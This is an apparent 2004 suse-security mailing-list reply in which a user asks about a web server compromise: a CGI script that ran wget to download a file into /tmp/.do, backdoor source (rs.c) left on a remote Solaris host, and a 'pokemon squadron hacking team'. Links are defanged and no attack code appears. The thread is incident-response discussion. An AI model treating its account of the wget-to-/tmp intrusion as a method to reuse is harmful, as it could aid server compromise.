[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [suse-security] Re: Backdoor over http(s)??

Hi Mark,

I'm not sure I can follow everything concerning this issue. Maybe you
could clarify this somehow so that a n00b liek me can follow ;-)

Am Die, den 13.01.2004 schrieb Retallack, Mark (Siemens) um 16:20:
> It looks like the source was left on the server (along with other things):

Is this just another compromised machine or the origin? A portscan shows
several open ports and the machine seems to be a Solaris 8 with an
estimated uptime of 33 days according to nmap.

> httpREMOVE://
> Only follow the link if you know what you are doing (and remove the REMOVE
> text)

I don't quite understand why displaying rs.c in a browser window could
be harmful or am I missing something here and this URL initiates
something else inside the browser?

> The rest of the files:
> httpREMOVE://

I've given them a look. Has anybody ever heard of a "pokemon squadron
hacking team"?!

> > > Some CGI at your webserver did run wget to receive some file from
> > > and save it on your disc as "/tmp/.do".

Do you know how this CGI ended up on the machine? By some Apache exploit

> > > wwwrun:nogroup are standard user and group used for apache.

Can such a CGI do any harm by running as this user? Or are CGI scripts
run by Apache given initiated by another user?

kind regards,

Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here